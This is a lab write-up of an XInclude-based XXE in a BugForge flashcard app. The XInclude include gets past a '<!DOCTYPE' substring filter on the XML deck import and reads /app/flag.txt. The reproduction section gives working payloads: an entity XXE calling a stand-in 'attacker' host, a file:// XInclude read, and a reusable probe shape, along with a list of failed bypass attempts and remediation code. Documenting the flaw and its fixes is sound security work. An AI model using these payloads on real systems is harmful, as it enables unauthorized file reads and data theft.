BugForge — 2026.05.13

Tanuki: XXE via XInclude (DOCTYPE Filter Bypass)

BugForge XML External Entity easy

Part 1: Pentest Report

Executive Summary

Tanuki is a spaced-repetition flashcard study application (React SPA + Express JSON API) hosted on the BugForge lab platform. Users register, study seeded decks, and import custom decks via a file upload that accepts JSON or XML. The XML import path routes uploaded bodies into a libxml2-based parser; a substring filter ahead of the parser blocks the literal bytes <!DOCTYPE, closing the canonical entity-based XXE path.

Testing confirmed 1 finding:

ID Title Severity CVSS CWE Endpoint
F1 XML External Entity (XXE) via XInclude on deck import High 6.5 CWE-611, CWE-184 POST /api/decks/import

The XInclude specification does not require any DOCTYPE token, so the substring filter has nothing to match. An <xi:include> element placed inside a card’s <front> field is resolved by the parser, the file content is persisted as the card’s text, and a subsequent GET /api/study/:deckId/cards returns it verbatim. The flag was read from /app/flag.txt.


Objective

Single objective: read the flag from the lab container. Any account is acceptable; no specific identity is required.


Scope / Initial Access

# Target Application
URL: https://lab-1778630791839-gvmes8.labs-app.bugforge.io

# Auth details
Registration: open, unauthenticated, no email verification.
POST /api/register issues a JWT (HS256) with payload {id, username, iat}.
Role is not encoded in the token; it is read server-side on each request.
Test account: id=4 username=haxor

The application returns a standard Express powered HTTP response and uses snake_case JSON keys (card_count, cards_studied). CORS is wide-open (Access-Control-Allow-Origin: *).


Reconnaissance: Frontend Advertised an XML Parse Path the Walkthrough Skipped

  1. The compiled React bundle (main.2a8c2eb1.js, md5 486d073089df9e3216ceed5c49dff009) was byte-identical to a prior tanuki engagement. Frontend code unchanged; backend may or may not be.
  2. The deck import file picker declares accept=".json,.xml". The operator walkthrough only exercised the JSON path; the XML path was wired but never tested.
  3. The JWT carries {id, username, iat} only. The /api/verify-token response includes a role field read from the database, and the frontend gates the /admin link on user.role === "admin".
  4. The seeded user table holds at least 3 prior accounts before the registered test account (id=4), implying id=1 is likely the administrator.
  5. /api/admin/users[/:id], /api/admin/decks[/:id], and /api/admin/cards[/:id] are referenced from the bundle as full CRUD surfaces.

The XML import surface (observation 2) was the primary motivator for the XXE hypothesis.


Application Architecture

Component Detail
Backend Node.js Express (x-powered-by: Express on every response)
Frontend React SPA + Material-UI, single bundle ~516 KB
Auth JWT HS256, payload {id, username, iat}; role read from DB on each request
XML parser libxml2-backed (Node binding such as libxmljs or libxmljs2); XInclude enabled; XML_PARSE_NONET set (network blocked); XML_PARSE_DTDLOAD evidently off (DTD loading not observed)
CORS Access-Control-Allow-Origin: * everywhere

API Surface

Endpoint Method Auth Notes
/api/register POST No Public registration; returns JWT
/api/login POST No Username + password
/api/verify-token GET Yes Returns {user: {id, username, email, full_name, role}}
/api/decks GET Yes Lists seeded decks (id 1, 2, 3)
/api/decks/:id GET Yes Single deck details
/api/decks/import POST Yes Multipart upload; declared formats .json and .xml
/api/study/:deckId/cards GET Yes Cards for a deck, including front / back fields
/api/study/progress POST Yes SM-2 review submission
/api/study/session POST Yes Records a study session
/api/admin/users[/:id] GET / POST / PUT / DELETE Yes (admin) Server returns 403 {"error":"Admin access required"} for non-admin

Known Users

Username ID Role
(unknown, presumed admin) 1 admin (inferred from FE role-gated link and admin-middleware existence)
(unknown) 2 unknown
(unknown) 3 unknown
haxor 4 user

Attack Chain Visualization

┌───────────────────────┐   ┌────────────────────────┐   ┌──────────────────────┐   ┌────────────────────────┐
│ POST /api/decks/      │   │ POST /api/decks/import │   │ Parser resolves      │   │ GET /api/study/:id/    │
│ import with <!DOCTYPE │ ▶ │ with xmlns:xi +        │ ▶ │ file:///app/flag.txt │ ▶ │ cards returns flag in  │
│ → 400 (filter blocks) │   │ <xi:include> in card   │   │ and persists it as   │   │ the card's front field │
│                       │   │ front → 200 imported   │   │ card.front           │   │                        │
└───────────────────────┘   └────────────────────────┘   └──────────────────────┘   └────────────────────────┘

Findings

F1: XML External Entity (XXE) via XInclude on deck import

Severity: High CVSS v3.1: 6.5, CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N CWE: CWE-611 (Improper Restriction of XML External Entity Reference), CWE-184 (Incomplete List of Disallowed Inputs) Endpoint: POST /api/decks/import Authentication required: Yes (any registered account; registration is open and unrestricted)

Description

The XML deck import endpoint is gated by a case-sensitive UTF-8 substring filter on the literal bytes <!DOCTYPE before the body reaches the parser. The filter blocks canonical entity-based XXE payloads (any body containing <!DOCTYPE returns 400 {"error":"Invalid file format or content"}).

XInclude does not require any DOCTYPE token. An XML body containing only the namespace declaration xmlns:xi="http://www.w3.org/2001/XInclude" and an <xi:include parse="text" href="file:///path"/> element passes the filter, is parsed by libxml2 with XInclude enabled, and the include is resolved during parse. The resolved file content is then assigned to whichever element contained the <xi:include> and is persisted as part of the imported deck. Reading the deck back via GET /api/study/:deckId/cards returns the file content verbatim in the card’s front field.

Two defects compound here:

  1. The pre-parse filter is a substring blocklist on a single token (<!DOCTYPE). It does not reject XInclude payloads or any other non-DTD XML feature that can resolve external resources.
  2. The XML parser is configured with XInclude resolution enabled and file:// resolution allowed. Only network resolution is blocked (XML_PARSE_NONET set), which prevents OOB but does not prevent local file reads.

Impact

Arbitrary file read on the application container, scoped to whatever Unix user the Node process runs as.

Reproduction

Step 1: Confirm the DOCTYPE filter rejects canonical XXE

POST /api/decks/import HTTP/1.1
Host: lab-1778630791839-gvmes8.labs-app.bugforge.io
Authorization: Bearer <JWT>
Content-Type: multipart/form-data; boundary=----b

------b
Content-Disposition: form-data; name="file"; filename="x.xml"
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE deck [<!ENTITY oob SYSTEM "http://attacker/p1">]>
<deck><name>&oob;</name></deck>
------b--

Response: 400 {"error":"Invalid file format or content"}. The same body without the <!DOCTYPE line parses successfully.

Step 2: Send an XInclude-based payload pointing to /app/flag.txt

POST /api/decks/import HTTP/1.1
Host: lab-1778630791839-gvmes8.labs-app.bugforge.io
Authorization: Bearer <JWT>
Content-Type: multipart/form-data; boundary=----b

------b
Content-Disposition: form-data; name="file"; filename="x.xml"
Content-Type: application/xml

<?xml version="1.0"?>
<deck xmlns:xi="http://www.w3.org/2001/XInclude">
  <name>x</name>
  <description>d</description>
  <category>p</category>
  <cards>
    <card>
      <front><xi:include parse="text" href="file:///app/flag.txt"/></front>
      <back>b</back>
    </card>
  </cards>
</deck>
------b--

Response: 200 {"id":N,"message":"Deck imported successfully","cards_count":1}. The numeric id is the new deck identifier.

Step 3: Read the resolved content back via the study endpoint

GET /api/study/N/cards HTTP/1.1
Host: lab-1778630791839-gvmes8.labs-app.bugforge.io
Authorization: Bearer <JWT>

Response (abridged):

[
  {
    "id": M,
    "front": "bug{uA8e4RWc9adWFnqaHR6ULX3az5j287ap}",
    "back": "b",
    "difficulty": 0.5,
    "repetitions": 0
  }
]

The card’s front field contains the file content. Substitute any readable file path in the href to read other files within the parser’s scope.

Remediation

Fix 1: Disable XInclude in the parser

// BEFORE (Vulnerable), libxmljs2-style options
const parsed = libxml.parseXml(body, {
  noent: false,
  nonet: true,
  xinclude: true
});

// AFTER (Secure)
const parsed = libxml.parseXml(body, {
  noent: false,
  nonet: true,
  xinclude: false,
  dtdload: false,
  doctype: false
});

Fix 2: If XInclude must be supported, restrict scheme and path resolution

// BEFORE (Vulnerable), XInclude resolves any file:// URI
const parsed = libxml.parseXml(body, { xinclude: true });

// AFTER (Secure), replace the resource loader with an allowlist
const parsed = libxml.parseXml(body, {
  xinclude: true,
  resourceLoader: (uri) => {
    if (!ALLOWED_INCLUDES.has(uri)) {
      throw new Error('XInclude target not permitted');
    }
    return readWhitelistedResource(uri);
  }
});

Fix 3: Replace the substring blocklist with parser-level hardening

// BEFORE (Vulnerable), pre-parse string check
if (body.includes('<!DOCTYPE')) {
  return res.status(400).json({ error: 'Invalid file format or content' });
}
const parsed = libxml.parseXml(body);

// AFTER (Secure), drop the string blocklist and configure the parser
const parsed = libxml.parseXml(body, {
  noblanks: true,
  noent: false,
  nonet: true,
  xinclude: false,
  dtdload: false,
  dtdvalid: false,
  doctype: false
});

Additional recommendations:

  • Stop using string blocklists as the primary defense against XXE. They are bypassable through encoding, case, whitespace, and class-of-attack pivots (XInclude here).
  • Treat XML deserialization as a sensitive operation; gate parser configuration centrally rather than per-handler.
  • For deck import specifically, prefer JSON-only on the wire; if XML support is a product requirement, parse to a constrained intermediate (e.g. JSON Schema) before persistence.
  • Restrict the application’s filesystem view at the container layer (read-only root filesystem, separate volume for flag/secret material, file ACLs that deny the Node user access to /app/flag.txt and .env-style files).
  • Apply consistent input validation across all upload-accepting endpoints, not just the one most recently scrutinized.

OWASP Top 10 Coverage

  • A05:2021, Security Misconfiguration: XML parser is configured with XInclude enabled by default. The protective measure (XML_PARSE_NONET) addresses the network resolution case but the local file resolution case was left enabled.
  • A03:2021, Injection: XInclude is an XML-feature injection: an attacker-controlled element is interpreted as a parser directive rather than as data.

Tools Used

Tool Purpose
Caido HTTP proxy and request editor for replaying and modifying requests captured from the operator walkthrough
curl Manual multipart payload construction for the XInclude probes (--data-binary + heredoc)
Bash Wrapping multipart boundary construction and iterating through candidate file paths

References


Part 2: Notes / Knowledge

Key Learnings

  • XInclude bypasses <!DOCTYPE substring filters on XML uploads. When DOCTYPE is the only filter, XInclude is the open door. Probe shape: <root xmlns:xi="http://www.w3.org/2001/XInclude"><elem><xi:include parse="text" href="file:///path"/></elem></root>, substituting the app’s schema for <root>/<elem> so the resolved text lands in a reflected field. Surfaced in libxml2 (Node libxmljs, libxmljs2), Python lxml, and Java parsers built on JAXP, wherever XInclude is enabled by parser flag.

Failed Approaches

Approach Result Why It Failed
Canonical DOCTYPE-bearing XXE (<!DOCTYPE deck [<!ENTITY oob SYSTEM "...">]>) 400 Invalid file format or content Substring filter on <!DOCTYPE blocks the body before it reaches the parser
Bare DOCTYPE (<!DOCTYPE deck> with no entities) 400 same response Filter matches the literal <!DOCTYPE token regardless of what follows
Internal entity declaration without SYSTEM/PUBLIC 400 same response Filter does not distinguish entity types; rejects any <!DOCTYPE body
Parameter entity (<!ENTITY % p "v">) 400 same response Same filter; classification of entity semantics is irrelevant
Lowercase doctype (<!doctype ...>) 200, deck imported with cards_count: 0 Filter is case-sensitive so the body passes, but the resulting XML is invalid and the parser falls through to a stub path that imports an empty deck
Extra-whitespace doctype (<! DOCTYPE ...>) 200, cards_count: 0 Same as above; bypasses the filter but produces invalid XML
UTF-16 LE with BOM 400 or 200 stub Parser does not respect UTF-16 charset on the multipart part
Content-Type: text/xml instead of application/xml 400 Filter is content-type independent
Filename .json with XML content 400 Filter inspects body, not filename
XInclude with parse="text" href="http://..." 200, card front: "[object Object]" XML_PARSE_NONET blocks network resolution; the include fails and the parser emits a stub value
Frontend-only admin gate hypothesis (direct GET /api/admin/users with non-admin JWT) 403 Admin access required Server-side middleware enforces role; the frontend gate is not the only check
Mass assignment of role: "admin" on registration 200, but verify-token returns role: "user" Registration handler whitelists known fields; extra keys are silently dropped
JWT alg: "none" against /api/verify-token 403 Invalid token Server pins acceptable algorithms; unsigned tokens are rejected before role check
#xxe #xinclude #file-upload #libxml2 #bugforge #webapp #cwe-611 #owasp-a05